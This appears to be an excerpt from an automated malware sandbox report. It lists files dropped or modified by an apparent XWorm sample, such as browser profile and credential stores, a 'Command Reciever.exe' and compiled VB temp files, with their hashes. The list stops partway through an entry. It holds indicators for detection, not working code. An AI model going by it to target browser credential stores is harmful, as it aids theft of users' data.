                                                                                                                        MD5

                                                                                                                        b51e76416163446a34b8a85c2e21944f

                                                                                                                        SHA1

                                                                                                                        8e21d0a0160dec3eeeba9e532cb5bbfedfd9887c

                                                                                                                        SHA256

                                                                                                                        040f248bb2e618345b84c01c32356e7e0765ec3bef964be4f5b4824cd04f7372

                                                                                                                        SHA512

                                                                                                                        3bc56f8f5d130735a171300fc8fdaa265df1b9986dc49cde742ea3de00fd9b661525ba413f427cdda28ecdae1a6c6135ec31e122823159a6b4c524f7012841e5

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        8de5b779d4e43b6ef2746ff3bbebf600

                                                                                                                        SHA1

                                                                                                                        0bac0e53b5a4783ef6af521d63835d05f28c1bee

                                                                                                                        SHA256

                                                                                                                        62ddffdcbe2d7ca1e0c53c7ff5529c4ae867cab362c05f062b6d3b34cf218f12

                                                                                                                        SHA512

                                                                                                                        7c9eb4c672f08dbedddc069aeeca017c6c509a69d91e6511d4202c2c1e3291c8ecbee339dcd6c95a1c0c3fca0620d565424153ab4d34ca1b4c9dc51c3ca7762a

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        252bb12b1c9cf7645f3f29e887af3867

                                                                                                                        SHA1

                                                                                                                        cc8e670124c30e8c7cafa4b5e71d2e044c803121

                                                                                                                        SHA256

                                                                                                                        0759911aabb4bc267da2f4bd230fab9954090738063d27471eb2bf96214874c4

                                                                                                                        SHA512

                                                                                                                        199cbd3d2789a19e7a79f84f8828d93203cc2eb2682cbc43fc4c8884ab4eab41428c6715852fa9e4608d649088e54de0efadc19d88ed9fa56626f9957472f89f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        0d19c820b3c8f319213c104f1ecea04c

                                                                                                                        SHA1

                                                                                                                        3a755c2c03d3d41bd022359cbc0369ff0b69b4e1

                                                                                                                        SHA256

                                                                                                                        ed0cfc214fe8ef1a87410b3d1aa3b2bb90aa9a75cbb1909b887952ade64e050c

                                                                                                                        SHA512

                                                                                                                        1acc4ccda93ad207183459b2dbd815009b81822a8bf833ef6f40ee7f0bb229fc7a4aeaca873146307709a6c5ad02bfe566e8d3a7a7f8dbdf8eeee0eb07a84c2e

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        9KB

                                                                                                                        MD5

                                                                                                                        f9f4b76b95a8e99e4d24505621bd156d

                                                                                                                        SHA1

                                                                                                                        e6eaa45673b1851f2bcd9837e1ed422bb5074acd

                                                                                                                        SHA256

                                                                                                                        ca7a864902405493f17013df99c75171e1759a32b53d45fe2cc5327740d0adef

                                                                                                                        SHA512

                                                                                                                        0ba871003ce4e265f97b0e00a27a4062b5bc5f55a133c93398ffaa7df174ce5730293b2eda7241078840c56e3bc9ba8211f4a34eba05c56fb36030e56cbd985b

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        48ff81a4e6cb1d2403c6794ffa8257aa

                                                                                                                        SHA1

                                                                                                                        c11cc737edf3b9fbf18757885d989cddc01dd18e

                                                                                                                        SHA256

                                                                                                                        be71a04f2fab3e096e68f33df5753ac60c102ab1dd1370b5212892cb59b50cba

                                                                                                                        SHA512

                                                                                                                        1b32bca364fedfd3ada0bb5468ac31714dfea12cabc11141b6d1d790ed6c92baf20627d9eac3163fe29f2eb50555c2ab8670ec13157d40256c5d097b1836afdf

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        11KB

                                                                                                                        MD5

                                                                                                                        2c9763d7ca4610f46a5b20d0de63b284

                                                                                                                        SHA1

                                                                                                                        54fe26b83c779157efbf5c6da7b038027019e86a

                                                                                                                        SHA256

                                                                                                                        233b42f9d65f3e1d812498cd2adf377c08eff2407855317531b0fe12acd67f0c

                                                                                                                        SHA512

                                                                                                                        24a32c2e70bf3cec0232ee65ec775215cd4d1df7797a6ea4c45f46fd1243550616387b522bec8c4e016ed83e5394deb207ccffd9f700cdce675625f02f7bed05

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        06ef8d284f3c748edfbc3986f83a2999

                                                                                                                        SHA1

                                                                                                                        bcdfb8c858a256c5a8e48455a24864152a79bc21

                                                                                                                        SHA256

                                                                                                                        d784eb274389073f9d4424063b2309473e5b143b560b26cc81677618068674aa

                                                                                                                        SHA512

                                                                                                                        5ccd446b1c20071dafd37ebedf9accaaa8cf6eebf865c6e258ec2bf093d8a8154d0410f6fd861491bffe14bbfac82f334917de2adf31d5fd0ad8dde511b24a86

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                        Filesize

                                                                                                                        15KB

                                                                                                                        MD5

                                                                                                                        3d764449bbfc8c710364de110d6b50ab

                                                                                                                        SHA1

                                                                                                                        13bf1c6308829ccce3143371dc36bd1e851663f0

                                                                                                                        SHA256

                                                                                                                        3585bafd72d38c1a0a181820673e0858356a51dd2b2e85e308da49a055126b06

                                                                                                                        SHA512

                                                                                                                        f356228306d40b57a91e48c0e86f1779f2780b1a19524641e25e9e88e40d4d44b73c11230998ff7724ba515510e19e864c940b1df42eb7294450eceed352b188

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

                                                                                                                        Filesize

                                                                                                                        114KB

                                                                                                                        MD5

                                                                                                                        de05464de3e636cc40b507f76b739067

                                                                                                                        SHA1

                                                                                                                        06cf48f7ddac52da240bbe2b6bf0499649ed8229

                                                                                                                        SHA256

                                                                                                                        8ee6c35e9304dad768132bbafdd17885863dc8650859f155e63c59d9eecf8852

                                                                                                                        SHA512

                                                                                                                        d786c5b26a8c4642a7392d293be4887c93a4ed083a6542cb9e24798c982ad51637f4d87919c77820f89fc2a1e26135c5973ed871253631fbde4074ea2869973f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        124KB

                                                                                                                        MD5

                                                                                                                        f4724e2a9f66a5aaa3334100f3c260a2

                                                                                                                        SHA1

                                                                                                                        42944b7c536412168aa0a7dd3d2c7c8b80b9bf6a

                                                                                                                        SHA256

                                                                                                                        854605bc6d4c8134ac03eb70ee3be718d83b003c20313aa8108a405a3a285872

                                                                                                                        SHA512

                                                                                                                        bd7d09f513362d66082fa32dc560cd117e0c97f4a83e7583cd23ecc0d9e41145c17107fff05720ef218f2cfd255f52ab5b1acb3fae2b8142845cf8213d5d8f05

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        228KB

                                                                                                                        MD5

                                                                                                                        f4bc964e7c8014e73707f20645f2a856

                                                                                                                        SHA1

                                                                                                                        e131e14b05993c76be7536ca6b05c21ae32b1d0c

                                                                                                                        SHA256

                                                                                                                        9924ad8af9c6457c4558a7062dceb8563ce7e545235b63a8c4dc316a4c5b3563

                                                                                                                        SHA512

                                                                                                                        e38b1b0578b58f84e9ef59aae16742b5f3c5dbc9fcd0563c88e816c0db85aac2d4613714a0921ffb831fcfc075e214e39abcaf37027d594bbbef143e4d1c741f

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        236KB

                                                                                                                        MD5

                                                                                                                        5195438783e8cd2105f4b9737f139206

                                                                                                                        SHA1

                                                                                                                        5d416b17b44482f647c51945c3229110c565ba8f

                                                                                                                        SHA256

                                                                                                                        38c5537158427527171936823749482e542c555ecd117d9dd5b49ce0dc2529dc

                                                                                                                        SHA512

                                                                                                                        9ab65128b3accbf44440ad2c140180497d65d23969c50e9eced1efbcb83d78bfbe45ab3788fd4169b3f88c62ca76bcaae6de628f5de043d00fadfa9fbd2db297

                                                                                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        124KB

                                                                                                                        MD5

                                                                                                                        63197fe5f5f1a12c0a92cc4ec4d7e53f

                                                                                                                        SHA1

                                                                                                                        8152804351863a067066b4d5d1125cf0c819ef19

                                                                                                                        SHA256

                                                                                                                        2328a825e550173ea61434b93386a44b8dd164511676cc8d1f397b0f71580af0

                                                                                                                        SHA512

                                                                                                                        878d13d9375968befaabc3a2d68fd88c29053e68b0dd4ef426b2717d3d2246a222e1fa6256ddf5bbc744af5e25bf56c99a1b0aa3f9fd6fb8d7fc37bf69d11c5c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XWorm.exe.log

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        e7edf56d23e3eddab9453776bd1cc9ed

                                                                                                                        SHA1

                                                                                                                        36c5a79710d6810871de84443bc4f42c404504bc

                                                                                                                        SHA256

                                                                                                                        b115c8bd4e8c80eedb64322046695b1bb6783ddfebf7bf93a0562a12bb4de95a

                                                                                                                        SHA512

                                                                                                                        ab2c905ff55d9a202469218f65d6df63eac131c06886316ae4e8cd05dffaa42541d11df774d89629d0cc6df067ed9d0c2b44811952e4f3668c3e9d4fb84f57a1

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        b3b1b4c870d92c3e8747b495d6f3e8d7

                                                                                                                        SHA1

                                                                                                                        80d5d3cc4e1439b4607134229ef45be2c3dc0373

                                                                                                                        SHA256

                                                                                                                        6e33e82daa298874fa9f7c7fb155eba177c8e4e98445c1161a7004311b973322

                                                                                                                        SHA512

                                                                                                                        49ba5345e63d66a546c545fdb75f7388ec7679f396fa8b6ac8f2f20d89963464008bb3e9e63f6cb5eed370a8887bd7e27e9222390920ebe5e1e1c1ed5decf0d8

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        aa24a016facba3f07ea13871a7db1ad5

                                                                                                                        SHA1

                                                                                                                        cb6c06a7e07cdc84e7358cfb42e51a4bf8a5099c

                                                                                                                        SHA256

                                                                                                                        aa75e181dab887f0275fc24f957c9302c9afdb5553cd65585fc6b8482fc2bc58

                                                                                                                        SHA512

                                                                                                                        0804c0aaa0b8e374433a8a7d2db173e674883ab884fb102a01a29adce644dce9ac97528f86a7d89facba320bfc0176f789da5d51ccb257a227561559a54340f7

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        1fc959921446fa3ab5813f75ca4d0235

                                                                                                                        SHA1

                                                                                                                        0aeef3ba7ba2aa1f725fca09432d384b06995e2a

                                                                                                                        SHA256

                                                                                                                        1b1e89d3b2f3da84cc8494d07cf0babc472c426ccb1c4ae13398243360c9d02c

                                                                                                                        SHA512

                                                                                                                        899d1e1b0feece25ac97527daddcaaeb069cb428532477849eba43a627502c590261f2c26fef31e4e20efd3d7eb0815336a784c4d2888e05afcf5477af872b06

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                        Filesize

                                                                                                                        152B

                                                                                                                        MD5

                                                                                                                        e9a2c784e6d797d91d4b8612e14d51bd

                                                                                                                        SHA1

                                                                                                                        25e2b07c396ee82e4404af09424f747fc05f04c2

                                                                                                                        SHA256

                                                                                                                        18ddbb93c981d8006071f9d26924ce3357cad212cbb65f48812d4a474c197ce6

                                                                                                                        SHA512

                                                                                                                        fc35688ae3cd448ed6b2069d39ce1219612c54f5bb0dd7b707c9e6f39450fe9fb1338cf5bd0b82a45207fac2fbab1e0eae77e5c9e6488371390eab45f76a5df1

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_0

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                        MD5

                                                                                                                        85a5030c346a796dc1dcc12b0e4c2acb

                                                                                                                        SHA1

                                                                                                                        52e3af9ea4d19dce18043f1695fc2aa1358ba7ff

                                                                                                                        SHA256

                                                                                                                        cacfff4b212f4d52608a43e3f645293ce4cbc051b5110cfbc55977453e4b6e6b

                                                                                                                        SHA512

                                                                                                                        6e37959b51b7b10be3d38402e9562405435e1c88e929b1f53d6779dd5ed68d231562798ec98e03c412751c14cdacea0ab6a11fda17b32ced5668a232f71053de

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_1

                                                                                                                        Filesize

                                                                                                                        264KB

                                                                                                                        MD5

                                                                                                                        153b71954304b226b867ef74f9475341

                                                                                                                        SHA1

                                                                                                                        e47078d1c467cfe20a3a5ddb6917dc98f78f1454

                                                                                                                        SHA256

                                                                                                                        cc924ef0e23e3423bc4c98a537a9250fa0c03ed587c8402b244eed758b832420

                                                                                                                        SHA512

                                                                                                                        67506f2a89d1230c46dbd2ab5b5e5ecfe3c11bf9a223bb23c699012068ecbcc9b919fd483195753ebb4dae4ce0fc62d3ee0160fac83d5a2d679de83faaea784c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_2

                                                                                                                        Filesize

                                                                                                                        1.0MB

                                                                                                                        MD5

                                                                                                                        49867674346fb16ef8e32f52e00060c7

                                                                                                                        SHA1

                                                                                                                        7921784751ffa4a025aff07d95f364c30cad8cd2

                                                                                                                        SHA256

                                                                                                                        6456c179e6d2273654780fc871e0b15c47a70f225252b3b552b6dcacc19d8bdc

                                                                                                                        SHA512

                                                                                                                        23718740c51b4ca23ac1a66f626a1d37fc795a2a491878b6833e225c0eaf8742633ce0c10d3921a97f176f92e55d06adaa646a38940cb878773b99ee1f77cd8d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\data_3

                                                                                                                        Filesize

                                                                                                                        4.0MB

                                                                                                                        MD5

                                                                                                                        373f82c8d0238bfc58e2a377a1f50ab0

                                                                                                                        SHA1

                                                                                                                        050b45eb9d8d4113009ef64d4becff99f736f9bf

                                                                                                                        SHA256

                                                                                                                        478aca3b869848881078f352b3026df41eb15be8198da144b80cd4a72ca58665

                                                                                                                        SHA512

                                                                                                                        c96c8b92746d746619a6fd27f93c967a29c7df90f869ecf2e16254a687e9e398f1f42b44b2e97552ff7f57f406f44214fa6776180cb08cbfe57c9e88ea07da0a

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002

                                                                                                                        Filesize

                                                                                                                        38KB

                                                                                                                        MD5

                                                                                                                        adf2df4a8072227a229a3f8cf81dc9df

                                                                                                                        SHA1

                                                                                                                        48b588df27e0a83fa3c56d97d68700170a58bd36

                                                                                                                        SHA256

                                                                                                                        2fd56ac4d62fec83843c83054e5548834a19001c077cdb224901237f2e2c0e4c

                                                                                                                        SHA512

                                                                                                                        d18ffc9a41157ea96014a503640b3a2a3931f578293e88cc05aa61c8223221d948c05637875d8e3ee5847b6a99341ea22b6a1aee67c170e27bde5e154cf1b9ca

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                        MD5

                                                                                                                        99c59b603e12ae38a2bbc5d4d70c673e

                                                                                                                        SHA1

                                                                                                                        50ed7bb3e9644989681562a48b68797c247c3c14

                                                                                                                        SHA256

                                                                                                                        0b68cf3fd9c7c7f0f42405091daa1dda71da4a1e92ba17dad29feb00b63ef45f

                                                                                                                        SHA512

                                                                                                                        70973ea531ed385b64a3d4cb5b42a9b1145ec884400da1d27f31f79b4597f611dc5d1e32281003132dd22bf74882a937fc504441e5280d055520bfca737cf157

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005

                                                                                                                        Filesize

                                                                                                                        37KB

                                                                                                                        MD5

                                                                                                                        5873d4dc68262e39277991d929fa0226

                                                                                                                        SHA1

                                                                                                                        182eb3a0a6ee99ed84d7228e353705fd2605659a

                                                                                                                        SHA256

                                                                                                                        722960c9394405f7d8d0f48b91b49370e4880321c9d5445883aec7a2ca842ab4

                                                                                                                        SHA512

                                                                                                                        1ec06c216bfe254afbae0b16905d36adc31e666564f337eb260335ef2985b8c36f02999f93ab379293048226624a59832bfb1f2fa69d94a36c3ca2fdeebcdc3f

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00001d

                                                                                                                        Filesize

                                                                                                                        16KB

                                                                                                                        MD5

                                                                                                                        686cd4e029335cb803ea8b47ea727bd5

                                                                                                                        SHA1

                                                                                                                        acb03acb24c943d81a8e4822466201cc4114692c

                                                                                                                        SHA256

                                                                                                                        785ffc242cb18f8e9ccb9ab96c37df3cdf1612a38a325a2a9bcf8164eac6488d

                                                                                                                        SHA512

                                                                                                                        a54e055ca8e021757102aa6c7f9045959fa32a7db215595cda8419ac96f75f44e1f5846037e14b6a20d0db51c4b1e974aff1718e16ff5d7650e0b667ca09721c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                        Filesize

                                                                                                                        331B

                                                                                                                        MD5

                                                                                                                        826ee27313b6a5a36610509bc0c36eb0

                                                                                                                        SHA1

                                                                                                                        67834d8ea6e4d5248bc0a98166cfb7d2829c307c

                                                                                                                        SHA256

                                                                                                                        f573ca76a72f9a01fd54d7e633f25f39fc545a5a35b5a103d53dd7512706c17a

                                                                                                                        SHA512

                                                                                                                        33349e34c6ce2b8207051fb5a5c4a3eed8f1ad0e223b1cdc340e0d4f881f33e2d95097ab24f6448419818b1e51bb66f395c7237accc3c77791a5a7dfe7cdc60e

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                        Filesize

                                                                                                                        497B

                                                                                                                        MD5

                                                                                                                        e818cd8f738c4a514eb129db93416d88

                                                                                                                        SHA1

                                                                                                                        a0d9afd7ce98e0ca267bd0c43ca2e66350505354

                                                                                                                        SHA256

                                                                                                                        b243439e59e37618a5b5849a99a37e4fe7bf64d314f405d31d697f9a9aa459b7

                                                                                                                        SHA512

                                                                                                                        07d6825a365d8e4af2bbd20a2399547aaa43c837aecd778bc4af0627b5d8b90fdc923a7e6f1cd2d00aa250c1b55a83e9e2bd3077b8f2591a2b765fd27ae10ce7

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                                                                                                        Filesize

                                                                                                                        497B

                                                                                                                        MD5

                                                                                                                        dc0236cfedfbb36fd6af0fc3e22ea0e3

                                                                                                                        SHA1

                                                                                                                        2d28c1a0102fe77112acd5c0561fed10401f1318

                                                                                                                        SHA256

                                                                                                                        cdc2b8be759baadfac973ac79b72264ee1635f8afb0a961fca950fd806341bda

                                                                                                                        SHA512

                                                                                                                        976dd21c4fa4aeb188582a5da148213483ba871b6b44f7db1b7a489ad26e0bee441680aea7c40ba80738495d5a4a8745a00f321a7e9990107963f303b692bb9f

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        dd21a2de789d28fd2904e2ec066053cb

                                                                                                                        SHA1

                                                                                                                        3a5241e7fdc7e5744a591a574561fe5ab6d73529

                                                                                                                        SHA256

                                                                                                                        4b705faf8d1b38b78d351e0affe29ccc1748ddf1603c245609442e3b33f49f97

                                                                                                                        SHA512

                                                                                                                        7bd98996c1851f778a592567844ac59b1728f1c1b25552f4c95985ae63d932db8c69487f883be3c4f20082b6b3ead1dcb64f8e33ff9770cd27f3ced7225cdb12

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        15aa0f12165ea8ae80836738cd942076

                                                                                                                        SHA1

                                                                                                                        909b7140d3a140eb7879756bbc7a9d1d9c0c0fdd

                                                                                                                        SHA256

                                                                                                                        e6ec8f5d01e21bbe30fa03435f78cbcd986c54e825caf07181b4885f849a645d

                                                                                                                        SHA512

                                                                                                                        932aa24bc706763b47ba07583ae7ba405784c070f6ae3d6057c7475d7a7a438a16c91b0d3e2d93ddc3bea5f991ede7f2b7a491e308ccf3d3fde49594e7929a19

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        a2e23ebea37523824aad05557827582a

                                                                                                                        SHA1

                                                                                                                        d5c5b8316d3a9afb8aac8ada3382595d44a8bda5

                                                                                                                        SHA256

                                                                                                                        b3365772d37ec4de4b8a1f643bdc55a724abdc636ed2670742e4329c1a6478bd

                                                                                                                        SHA512

                                                                                                                        f8d22124a9976c7eb6139ee4ce19d2a867a0f91fcf0fd701220ec81a4bf8255f485ea18d249b6c58177437c90313bd9ecd4211291fcaf358f343bfba3fa57c65

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        5KB

                                                                                                                        MD5

                                                                                                                        1dae2943281bae325c25afc9b3389d2c

                                                                                                                        SHA1

                                                                                                                        078c84e5d5b822ed4b07fe7e77b9c9c63dd0fa52

                                                                                                                        SHA256

                                                                                                                        5131281b2915eef857d3f1b7dfa20ecc65bdbfd3a742b6d48926d0c606f39381

                                                                                                                        SHA512

                                                                                                                        7d4e18eca3137c43c0067a283819922db37a70aea8106f11fac6658050d12e1fcdfa7b1403c98fb88c67698887c10a98fb1d5dd4732adfc5f534f7ba11198ef4

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                        Filesize

                                                                                                                        6KB

                                                                                                                        MD5

                                                                                                                        3c5bb60262be7a77251bd7092f4ff6c4

                                                                                                                        SHA1

                                                                                                                        ef6b16b934318d684b533f083fe82823c2d3b657

                                                                                                                        SHA256

                                                                                                                        c447558858429f6cbac3cb0745bb985f717a36671d8bfbbcc14a198d65eeb469

                                                                                                                        SHA512

                                                                                                                        628fc66f1debec4f688812a5a301e847b1d3f87deff802de3804d7a2bcf2f4c8b8757e79dcc56a434855b0a50c065980448f39663760651764578d898f2bfb4c

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                        Filesize

                                                                                                                        339B

                                                                                                                        MD5

                                                                                                                        7d0f930b7ebd27051691f7a945c3ea15

                                                                                                                        SHA1

                                                                                                                        b52a762ca44806ee6497d48a07522921de13adf8

                                                                                                                        SHA256

                                                                                                                        cfe057ea3a40ecf7bdafbb4ae3c003232448d16d7f25d8e08df391c21d6b06c1

                                                                                                                        SHA512

                                                                                                                        078053504e3158bc6813c5de2837ee4ad52c10c5eab95cd093b2dbb01668b7a224575050f7f198f5fa816f038089e5839a096d0e3efd78a81ba694a32ccd0726

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                        Filesize

                                                                                                                        322B

                                                                                                                        MD5

                                                                                                                        7475bc3af7e0dbc1a046f8ba9dc2b84d

                                                                                                                        SHA1

                                                                                                                        eb7685ac918d8b76ccd35a5effdf2664e84c98fa

                                                                                                                        SHA256

                                                                                                                        074c0fde4a49247e501fd7e21aa868368f6c4dfbe372599f8864ea2c345ae905

                                                                                                                        SHA512

                                                                                                                        2fcafe707b0d3245836f2e7f10f3748aac78649d0828f0c46a7413c05ecb23d2d0d2f2a9852d9fb09623a121f5db13e8c960bf5800feed68621dda67fa4acb99

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        3e318454d97e9b33f43f6121758845c2

                                                                                                                        SHA1

                                                                                                                        8c92daa512df42caeb6ce231c0a23eb33e194c6d

                                                                                                                        SHA256

                                                                                                                        e5dca9312aad92c102d6a96e09042290224ffc2ca6a3137647b3b71b2b3f5a0d

                                                                                                                        SHA512

                                                                                                                        d813eacaef89853cdc0d082906fea3242c9ca817ddc1c38e480a3c614f9ee64b0cb1e0c15d2b296e84f36894f12fec6eb06f5bc19ba4e47fa7537ca5385f348d

                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                                                                        Filesize

                                                                                                                        10KB

                                                                                                                        MD5

                                                                                                                        2412032cc5e6a1e4960d5bdab7975e1f

                                                                                                                        SHA1

                                                                                                                        b554a2295a5775fbf7dc2e1c34c1cf47311d3d6f

                                                                                                                        SHA256

                                                                                                                        7f133301667ac5e872e4daf701d3b57612caaf1d2aa1dacd9503fd5cbbe176cb

                                                                                                                        SHA512

                                                                                                                        28ae0fd20554eef07352e074188b3297c3ff266489bc077641a0621cdfbfcd38660211bd8a1401ddb07e4d578a5835561dd2df84f37afabca447205880ad386e

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\0oxobg2n\0oxobg2n.0.vb

                                                                                                                        Filesize

                                                                                                                        60KB

                                                                                                                        MD5

                                                                                                                        93f72d18b076875d762e812123770c09

                                                                                                                        SHA1

                                                                                                                        29bd3a7e9b63dbeed4043b9ea41440f20f5b8554

                                                                                                                        SHA256

                                                                                                                        ebe538606d28d0788b790b0ff53b7ee9abd2abedaa00842e87a1173cff65ec89

                                                                                                                        SHA512

                                                                                                                        9f281ef00246817e470bef50e37bd7f3d58ef35a9b2309d1ac621a1a0e460220caf62ac9ff1381dd6bb512fe967aa02a68a40b4dd9fd2526a006f6a0707560c2

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\0oxobg2n\0oxobg2n.cmdline

                                                                                                                        Filesize

                                                                                                                        267B

                                                                                                                        MD5

                                                                                                                        c991365af9ef96ec03a88768bbcc2c94

                                                                                                                        SHA1

                                                                                                                        82548092c4fa2aab7c24b86d84a21b47af97441e

                                                                                                                        SHA256

                                                                                                                        dae74671b3d56f188635cfe60aea5ddeb2cd5a53f97df22c63b17b07317f1d14

                                                                                                                        SHA512

                                                                                                                        5f0a7359234b9a846c9a280e340f00817ff4bb7e0d925823637c98d605c8ddc8904d28fe0ce38ee219e9be9d5edfd59b4f5cf09571db693c4f305716d25551ee

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe

                                                                                                                        Filesize

                                                                                                                        5.7MB

                                                                                                                        MD5

                                                                                                                        fb25fdd6ff14150c12aadd9ee2d1a132

                                                                                                                        SHA1

                                                                                                                        3cfb3536cd95f0b45e3540241b29aaac8195969b

                                                                                                                        SHA256

                                                                                                                        30aa5d63d57d96e48788efcf488f3fb7ba05354313a383f15d5c5caca632c87c

                                                                                                                        SHA512

                                                                                                                        ffa52a7225aab5c5518d2ec872b20bb81a964b41205308cb72356e8f443b333a89239920989ffe032f5b5009d34ea04c4ffa8944e648633321c9a6685a3d9494

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe:Zone.Identifier

                                                                                                                        Filesize

                                                                                                                        83B

                                                                                                                        MD5

                                                                                                                        95bab9dd14853aee78129288e8c45f28

                                                                                                                        SHA1

                                                                                                                        563777d569a67ad38ce522dd82fa8bd854126b04

                                                                                                                        SHA256

                                                                                                                        73133a3a8bc13080ed4b6c22e7bc9126a9fd343436e09ac2a83f3f8bc578fc37

                                                                                                                        SHA512

                                                                                                                        201473a26a2099b10a58b2a46e70ec4c5388b497f76b53e0b7cf742576cb46676aca76a5452c4f6a109f92490192bd8eaa0b47d7cd563db45880b36d3156c6b6

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

                                                                                                                        Filesize

                                                                                                                        1.7MB

                                                                                                                        MD5

                                                                                                                        65ccd6ecb99899083d43f7c24eb8f869

                                                                                                                        SHA1

                                                                                                                        27037a9470cc5ed177c0b6688495f3a51996a023

                                                                                                                        SHA256

                                                                                                                        aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

                                                                                                                        SHA512

                                                                                                                        533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RESB82B.tmp

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        cd77fd91cd7752c5c8b404f0eec1c7d1

                                                                                                                        SHA1

                                                                                                                        2489d68133f6d9d800e61c16079342d2448a3977

                                                                                                                        SHA256

                                                                                                                        f2be7312e0e7bcc7f8f8064f31de96d56787c600fb8b9340a012a0e7497cb8d7

                                                                                                                        SHA512

                                                                                                                        61ca21f4427f29b483df51fb2580d476282e40b47bdc6ea8ffe567967696fa26726b352f98916124d6155bd73fc9ab92122cb91dd3e4d720283674e9b0035986

                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\tmpAC48.tmp.bat

